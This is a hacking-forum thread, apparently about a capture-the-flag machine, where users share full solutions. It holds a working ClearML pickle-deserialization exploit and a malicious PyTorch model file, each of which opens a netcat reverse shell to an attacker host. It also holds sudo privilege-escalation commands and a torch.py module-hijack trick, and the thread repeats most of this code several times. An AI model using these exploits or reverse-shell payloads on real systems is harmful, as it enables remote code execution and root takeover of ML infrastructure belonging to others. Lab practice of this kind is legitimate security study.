Posts: 59
Threads: 1
Joined: Jun 2024
(Jun 09, 2024, 09:04 AM)wh1t3_r4bb1t Wrote: (Jun 09, 2024, 06:09 AM)Szakyro Wrote: (Jun 09, 2024, 05:35 AM)3kyy Wrote: Payload exploit.py
#!/usr/bin/env python3
import os
import pickle
from clearml import Task
class RunCommand:
def __reduce__(self):
return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.xx 443 >/tmp/f',))
command = RunCommand()
task = Task.init(project_name='Black Swan', task_name='pickle_artifact_upload', tags=['review'], output_uri=True)
task.upload_artifact(name='pickle_artifact', artifact_object=command, retries=2, wait_on_upload=True)
Root
rm -rf /usr/bin/evaluate_model.py
echo -e 'import pty\npty.spawn("/bin/bash")' > evaluate_model.py
sudo /usr/bin/evaluate_model /models/*.pth
Can you please tell me where do you need to enter that payload? I'm cloning one of the training models and editing it and putting the pyload in uncommited changes, but it's not triggering after adding it in queue
In comment it's a full solution for user flag. Just clearml-init -> paste your config(app{...}, you can copy it from website), run that python script, it will init new task, upload artifact to it and add review tagg to trigger user to run it.
Thanks
Posts: 17
Threads: 0
Joined: Jun 2024
any hint for root, dose we have get other shell and then create .pth file or in same shell that got before creating .pth file and get shell as root
Posts: 219
Threads: 14
Joined: Apr 2024
for root in details make this .py file like shell.py
import torch
import torch.nn as nn
import os
class CustomModel(nn.Module):
def __init__(self):
super(CustomModel, self).__init__()
self.linear = nn.Linear(10, 1)
def forward(self, x):
return self.linear(x)
def __reduce__(self):
# Custom reduce method
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.x.x 4444 >/tmp/f"
return os.system, (cmd,)
# Create an instance of the model
model = CustomModel()
# Save the model using torch.save
torch.save(model, 'evil.pth')
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that run it with python3 --> python3 shell.py --> u will get evil.pth in the samy directory --> mv it to /models --> mv evil.pth /models/
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that in new terminal nc -nlvp 4444
--------------------------------------------------------------------------------------------------------------------------------------------------------------
sudo /usr/bin/evaluate_model /models/evil.pth --> pwned This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 245
Threads: 29
Joined: Nov 2023
(Jun 09, 2024, 01:53 PM)osamy7593 Wrote: for root in details make this .py file like shell.py
import torch
import torch.nn as nn
import os
class CustomModel(nn.Module):
def __init__(self):
super(CustomModel, self).__init__()
self.linear = nn.Linear(10, 1)
def forward(self, x):
return self.linear(x)
def __reduce__(self):
# Custom reduce method
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.x.x 4444 >/tmp/f"
return os.system, (cmd,)
# Create an instance of the model
model = CustomModel()
# Save the model using torch.save
torch.save(model, 'evil.pth')
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that run it with python3 --> python3 shell.py --> u will get evil.pth in the samy directory --> mv it to /models --> mv evil.pth /models/
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that in new terminal nc -nlvp 4444
--------------------------------------------------------------------------------------------------------------------------------------------------------------
sudo /usr/bin/evaluate_model /models/evil.pth --> pwned
this might be the correct way to get root.
Thanks @paw for the rank!!
Posts: 40
Threads: 2
Joined: Jan 2024
(Jun 09, 2024, 02:19 PM)macavitysworld Wrote: (Jun 09, 2024, 01:53 PM)osamy7593 Wrote: for root in details make this .py file like shell.py
import torch
import torch.nn as nn
import os
class CustomModel(nn.Module):
def __init__(self):
super(CustomModel, self).__init__()
self.linear = nn.Linear(10, 1)
def forward(self, x):
return self.linear(x)
def __reduce__(self):
# Custom reduce method
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.x.x 4444 >/tmp/f"
return os.system, (cmd,)
# Create an instance of the model
model = CustomModel()
# Save the model using torch.save
torch.save(model, 'evil.pth')
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that run it with python3 --> python3 shell.py --> u will get evil.pth in the samy directory --> mv it to /models --> mv evil.pth /models/
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that in new terminal nc -nlvp 4444
--------------------------------------------------------------------------------------------------------------------------------------------------------------
sudo /usr/bin/evaluate_model /models/evil.pth --> pwned
this might be the correct way to get root.
When I save shell.py the evil.pth is save to models but dissapear and I have an error. the same with my shell.py scrip. What it is ? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 219
Threads: 14
Joined: Apr 2024
(Jun 09, 2024, 01:53 PM)osamy7593 Wrote: for root in details make this .py file like shell.py
import torch
import torch.nn as nn
import os
class CustomModel(nn.Module):
def __init__(self):
super(CustomModel, self).__init__()
self.linear = nn.Linear(10, 1)
def forward(self, x):
return self.linear(x)
def __reduce__(self):
# Custom reduce method
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.x.x 4444 >/tmp/f"
return os.system, (cmd,)
# Create an instance of the model
model = CustomModel()
# Save the model using torch.save
torch.save(model, 'evil.pth')
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that run it with python3 --> python3 shell.py --> u will get evil.pth in the samy directory --> mv it to /models --> mv evil.pth /models/
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that in new terminal nc -nlvp 4444
--------------------------------------------------------------------------------------------------------------------------------------------------------------
sudo /usr/bin/evaluate_model /models/evil.pth --> pwned
First of all u have to do this --> rm -rf /usr/bin/evaluate_model.py This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 245
Threads: 29
Joined: Nov 2023
Jun 09, 2024, 04:06 PM
(This post was last modified: Jun 09, 2024, 04:21 PM by macavitysworld.)
(Jun 09, 2024, 03:36 PM)osamy7593 Wrote: (Jun 09, 2024, 01:53 PM)osamy7593 Wrote: for root in details make this .py file like shell.py
import torch
import torch.nn as nn
import os
class CustomModel(nn.Module):
def __init__(self):
super(CustomModel, self).__init__()
self.linear = nn.Linear(10, 1)
def forward(self, x):
return self.linear(x)
def __reduce__(self):
# Custom reduce method
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.x.x 4444 >/tmp/f"
return os.system, (cmd,)
# Create an instance of the model
model = CustomModel()
# Save the model using torch.save
torch.save(model, 'evil.pth')
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that run it with python3 --> python3 shell.py --> u will get evil.pth in the samy directory --> mv it to /models --> mv evil.pth /models/
--------------------------------------------------------------------------------------------------------------------------------------------------------------
after that in new terminal nc -nlvp 4444
--------------------------------------------------------------------------------------------------------------------------------------------------------------
sudo /usr/bin/evaluate_model /models/evil.pth --> pwned
First of all u have to do this --> rm -rf /usr/bin/evaluate_model.py
no, both are different approaches. the one you are mentioning is editing the contents of /models/evaluate_model.py
which is being called in the but the actuall path is to create a malicious model (.pth) and get shell as root.
Thanks @paw for the rank!!
Posts: 4
Threads: 0
Joined: Jan 2024
I got this error
`[!] Unknown or unsupported file format for /models/evil.pth`
Posts: 14
Threads: 0
Joined: Apr 2024
For root, here's an unintended way,
go to models , create a torch.py file
import os
os.system("/bin/bash")
run the evaluate_model as sudo on the demo_model.pth. the python script should import the file you just created and you should drop into root.
Posts: 14
Threads: 0
Joined: Apr 2024
Jun 13, 2024, 09:15 PM
(This post was last modified: Jun 13, 2024, 10:10 PM by inactive.)
https://imgur.com/a/rUev7ij
who left this readme on my machine bruh? and wdym by this?
i have noticed it just now after turning this on second time, it was full clear virtual machine btw.
|
